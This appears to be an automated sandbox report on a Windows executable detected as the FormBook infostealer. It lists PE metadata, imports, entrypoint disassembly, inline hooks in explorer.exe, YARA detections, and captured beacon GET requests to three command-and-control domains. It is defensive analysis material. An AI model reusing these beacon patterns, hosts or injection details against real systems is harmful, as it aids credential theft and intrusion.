                        SHA256:029d4fe47cb21a8f4e1dbe1863cf43cba6ac777e008b9675d381fda82986196b
                        SHA512:5f1bb5a77d471e49e15ff414b24ac89858e5458884f8f672a92376434dd9363e6d80146d6448b4ee0233c70531f58c4c7d431d9f873e6d1a2fdacf680479b2c6
                        SSDEEP:6144:QBn14u11x6y/QH2tw81qVegiZU/S4RaXFKia7ZiOfu:g4uRX4WvqMgiZgSXFKhZiO2
                        TLSH:224412ABB2E70AB3C46345729F35B331E67EE910113456BF33E22E779E702979406291
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.*]...RF..RG.pRF.*]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........

                        File Icon

                        Icon Hash:b2a88c96b2ca6a72

                        Static PE Info

                        General

                        Entrypoint:0x40324f
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        DLL Characteristics:TERMINAL_SERVER_AWARE
                        Time Stamp:0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:ab6770b0a8635b9d92a5838920cfe770

                        Entrypoint Preview

                        Instruction
                        sub esp, 00000180h
                        push ebx
                        push ebp
                        push esi
                        push edi
                        xor ebx, ebx
                        push 00008001h
                        mov dword ptr [esp+1Ch], ebx
                        mov dword ptr [esp+14h], 00409130h
                        xor esi, esi
                        mov byte ptr [esp+18h], 00000020h
                        call dword ptr [004070B8h]
                        call dword ptr [004070B4h]
                        cmp ax, 00000006h
                        je 00007F91F4D06083h
                        push ebx
                        call 00007F91F4D08E71h
                        cmp eax, ebx
                        je 00007F91F4D06079h
                        push 00000C00h
                        call eax
                        push 004091E0h
                        call 00007F91F4D08DF2h
                        push 004091D8h
                        call 00007F91F4D08DE8h
                        push 004091CCh
                        call 00007F91F4D08DDEh
                        push 0000000Dh
                        call 00007F91F4D08E41h
                        push 0000000Bh
                        call 00007F91F4D08E3Ah
                        mov dword ptr [00423F84h], eax
                        call dword ptr [00407034h]
                        push ebx
                        call dword ptr [00407270h]
                        mov dword ptr [00424038h], eax
                        push ebx
                        lea eax, dword ptr [esp+34h]
                        push 00000160h
                        push eax
                        push ebx
                        push 0041F538h
                        call dword ptr [00407160h]
                        push 004091C0h
                        push 00423780h
                        call 00007F91F4D08A71h
                        call dword ptr [004070B0h]
                        mov ebp, 0042A000h
                        push eax
                        push ebp
                        call 00007F91F4D08A5Fh
                        push ebx
                        call dword ptr [00407144h]

                        Rich Headers

                        Programming Language:
                        • [EXP] VC++ 6.0 SP5 build 8804

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x73cc0xa0.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x9e0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x5c4a0x5e00False0.659906914893617data6.410763775060762IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x70000x115e0x1200False0.4466145833333333data5.142548180775325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x90000x1b0780x600False0.455078125data4.2252195571372315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x2d0000x9e00xa00False0.45625data4.509328731926377IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_ICON0x2d1900x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                        RT_DIALOG0x2d4780x100dataEnglishUnited States
                        RT_DIALOG0x2d5780x11cdataEnglishUnited States
                        RT_DIALOG0x2d6980x60dataEnglishUnited States
                        RT_GROUP_ICON0x2d6f80x14dataEnglishUnited States
                        RT_MANIFEST0x2d7100x2ccXML 1.0 document, ASCII text, with very long lines (716), with no line terminatorsEnglishUnited States

                        Imports

                        DLLImport
                        KERNEL32.dllSetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
                        USER32.dllGetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                        ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 29, 2022 13:17:16.933298111 CET4969680192.168.2.434.117.168.233
                        Nov 29, 2022 13:17:16.956123114 CET804969634.117.168.233192.168.2.4
                        Nov 29, 2022 13:17:16.956255913 CET4969680192.168.2.434.117.168.233
                        Nov 29, 2022 13:17:16.956408024 CET4969680192.168.2.434.117.168.233
                        Nov 29, 2022 13:17:16.978993893 CET804969634.117.168.233192.168.2.4
                        Nov 29, 2022 13:17:17.045778036 CET804969634.117.168.233192.168.2.4
                        Nov 29, 2022 13:17:17.045831919 CET804969634.117.168.233192.168.2.4
                        Nov 29, 2022 13:17:17.045938969 CET4969680192.168.2.434.117.168.233
                        Nov 29, 2022 13:17:17.046009064 CET4969680192.168.2.434.117.168.233
                        Nov 29, 2022 13:17:17.068516970 CET804969634.117.168.233192.168.2.4
                        Nov 29, 2022 13:17:37.271229029 CET4969780192.168.2.475.2.81.221
                        Nov 29, 2022 13:17:37.290606976 CET804969775.2.81.221192.168.2.4
                        Nov 29, 2022 13:17:37.290796041 CET4969780192.168.2.475.2.81.221
                        Nov 29, 2022 13:17:37.291032076 CET4969780192.168.2.475.2.81.221
                        Nov 29, 2022 13:17:37.310297966 CET804969775.2.81.221192.168.2.4
                        Nov 29, 2022 13:17:37.432542086 CET804969775.2.81.221192.168.2.4
                        Nov 29, 2022 13:17:37.432614088 CET804969775.2.81.221192.168.2.4
                        Nov 29, 2022 13:17:37.432749987 CET4969780192.168.2.475.2.81.221
                        Nov 29, 2022 13:17:37.432842016 CET4969780192.168.2.475.2.81.221
                        Nov 29, 2022 13:17:37.447979927 CET804969775.2.81.221192.168.2.4
                        Nov 29, 2022 13:17:37.448339939 CET4969780192.168.2.475.2.81.221
                        Nov 29, 2022 13:17:37.452009916 CET804969775.2.81.221192.168.2.4
                        Nov 29, 2022 13:17:57.920108080 CET4969880192.168.2.445.221.114.43
                        Nov 29, 2022 13:17:58.118402004 CET804969845.221.114.43192.168.2.4
                        Nov 29, 2022 13:17:58.127572060 CET4969880192.168.2.445.221.114.43
                        Nov 29, 2022 13:17:58.127811909 CET4969880192.168.2.445.221.114.43
                        Nov 29, 2022 13:17:58.326272964 CET804969845.221.114.43192.168.2.4
                        Nov 29, 2022 13:17:58.326320887 CET804969845.221.114.43192.168.2.4
                        Nov 29, 2022 13:17:58.332259893 CET4969880192.168.2.445.221.114.43
                        Nov 29, 2022 13:17:58.332482100 CET4969880192.168.2.445.221.114.43
                        Nov 29, 2022 13:17:58.530942917 CET804969845.221.114.43192.168.2.4

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 29, 2022 13:17:16.879111052 CET5091153192.168.2.48.8.8.8
                        Nov 29, 2022 13:17:16.917241096 CET53509118.8.8.8192.168.2.4
                        Nov 29, 2022 13:17:37.245763063 CET5968353192.168.2.48.8.8.8
                        Nov 29, 2022 13:17:37.270123005 CET53596838.8.8.8192.168.2.4
                        Nov 29, 2022 13:17:57.618912935 CET6416753192.168.2.48.8.8.8
                        Nov 29, 2022 13:17:57.917346954 CET53641678.8.8.8192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Nov 29, 2022 13:17:16.879111052 CET192.168.2.48.8.8.80xf9d3Standard query (0)www.cdlcapitolsolutions.comA (IP address)IN (0x0001)false
                        Nov 29, 2022 13:17:37.245763063 CET192.168.2.48.8.8.80x5ae3Standard query (0)www.easyentry.vipA (IP address)IN (0x0001)false
                        Nov 29, 2022 13:17:57.618912935 CET192.168.2.48.8.8.80x9a51Standard query (0)www.fulili.comA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Nov 29, 2022 13:17:16.917241096 CET8.8.8.8192.168.2.40xf9d3No error (0)www.cdlcapitolsolutions.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                        Nov 29, 2022 13:17:16.917241096 CET8.8.8.8192.168.2.40xf9d3No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                        Nov 29, 2022 13:17:16.917241096 CET8.8.8.8192.168.2.40xf9d3No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                        Nov 29, 2022 13:17:37.270123005 CET8.8.8.8192.168.2.40x5ae3No error (0)www.easyentry.vip825610.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                        Nov 29, 2022 13:17:37.270123005 CET8.8.8.8192.168.2.40x5ae3No error (0)825610.parkingcrew.net75.2.81.221A (IP address)IN (0x0001)false
                        Nov 29, 2022 13:17:57.917346954 CET8.8.8.8192.168.2.40x9a51No error (0)www.fulili.com45.221.114.43A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • www.cdlcapitolsolutions.com
                        • www.easyentry.vip
                        • www.fulili.com

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.44969634.117.168.23380C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Nov 29, 2022 13:17:16.956408024 CET93OUTGET /b31b/?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDi HTTP/1.1
                        Host: www.cdlcapitolsolutions.com
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Nov 29, 2022 13:17:17.045778036 CET94INHTTP/1.1 301 Moved Permanently
                        Date: Tue, 29 Nov 2022 12:17:17 GMT
                        Content-Length: 0
                        location: https://www.cdlcapitolsolutions.com/b31b?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM%2FDtT372TknNdyW&q0DDzX=YreDi
                        strict-transport-security: max-age=3600
                        x-wix-request-id: 1669724236.9665837385348624
                        Age: 0
                        X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMczEIsYYIUgbpLTy7ZMRIqH,qquldgcFrj2n046g4RNSVMxfheUO4XmnqrwYf15pULU=,2d58ifebGbosy5xc+FRalkqGZ+srQEsQa6ACySUQ3ei7G3byzO4zYADApXv6H0bAjoe2GMQJ/MdiMK4Y/vI707CPiwTyl7qOS00UdJghtpw=,2UNV7KOq4oGjA5+PKsX47NTaFvZEsXIsLVjEfrvlXStWd3xniMsr1HjrszKGvMzr,7npGRUZHWOtWoP0Si3wDp+hfs1rivG7/v7T+EhRgHXY=,xTu8fpDe3EKPsMR1jrheECQ6KG7Duxa5JA6ghVSJqJc=,7qRhWu5NOm1hVs7o3HvocP8sS1A+spV+AvymmWxLESdg1Vmk6zJnW8ULLjSvaa25CONUzZLbexpS3PEZaUF96g==
                        Cache-Control: no-cache
                        server-timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3_g
                        X-Content-Type-Options: nosniff
                        Server: Pepyaka/1.19.10
                        Via: 1.1 google
                        Connection: close


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.44969775.2.81.22180C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Nov 29, 2022 13:17:37.291032076 CET95OUTGET /b31b/?8pq=kQFV/3Ti5731GiKzPcF+l7m9iVSkkn86bXlgwK5ZhVk2Z3fCEdzJJK3qVV3FyS9CSUee&q0DDzX=YreDi HTTP/1.1
                        Host: www.easyentry.vip
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Nov 29, 2022 13:17:37.432542086 CET95INHTTP/1.1 403 Forbidden
                        Date: Tue, 29 Nov 2022 12:17:37 GMT
                        Content-Type: text/html
                        Content-Length: 146
                        Connection: close
                        Server: nginx
                        Vary: Accept-Encoding
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.44969845.221.114.4380C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Nov 29, 2022 13:17:58.127811909 CET97OUTGET /b31b/?8pq=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&q0DDzX=YreDi HTTP/1.1
                        Host: www.fulili.com
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Nov 29, 2022 13:17:58.326272964 CET98INHTTP/1.1 404 Not Found
                        Content-Type: text/html
                        Server: Microsoft-IIS/7.5
                        X-Powered-By: ASP.NET
                        Date: Tue, 29 Nov 2022 12:17:56 GMT
                        Connection: close
                        Content-Length: 1163
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be b3 fd a3 ac d2 d1 b8 fc b8 c4 c3 fb b3 c6 bb f2 d5 df d4 dd ca b1 b2 bb bf c9 d3
                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3>
                        Nov 29, 2022 13:17:58.326320887 CET98INData Raw: c3 a1 a3 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: </h3> </fieldset></div></div></body></html>


                        Code Manipulations

                        User Modules

                        Hook Summary

                        Function NameHook TypeActive in Processes
                        PeekMessageAINLINEexplorer.exe
                        PeekMessageWINLINEexplorer.exe
                        GetMessageWINLINEexplorer.exe
                        GetMessageAINLINEexplorer.exe

                        Processes

                        Process: explorer.exe, Module: user32.dll
                        Function NameHook TypeNew Data
                        PeekMessageAINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE5
                        PeekMessageWINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE5
                        GetMessageWINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE5
                        GetMessageAINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE5

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:13:15:56
                        Start date:29/11/2022
                        Path:C:\Users\user\Desktop\2022-571-GLS.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\2022-571-GLS.exe
                        Imagebase:0x400000
                        File size:274453 bytes
                        MD5 hash:6CC14805BBF5E6BFB4DAAE5C8A61AF7E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        General

                        Target ID:1
                        Start time:13:15:57
                        Start date:29/11/2022
                        Path:C:\Users\user\AppData\Local\Temp\jsqqecy.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
                        Imagebase:0xbc0000
                        File size:147968 bytes
                        MD5 hash:07875284CE0A6276F406B25F9E429270
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 20%, ReversingLabs
                        Reputation:low

                        General

                        Target ID:2
                        Start time:13:15:57
                        Start date:29/11/2022
                        Path:C:\Users\user\AppData\Local\Temp\jsqqecy.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
                        Imagebase:0xbc0000
                        File size:147968 bytes
                        MD5 hash:07875284CE0A6276F406B25F9E429270
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
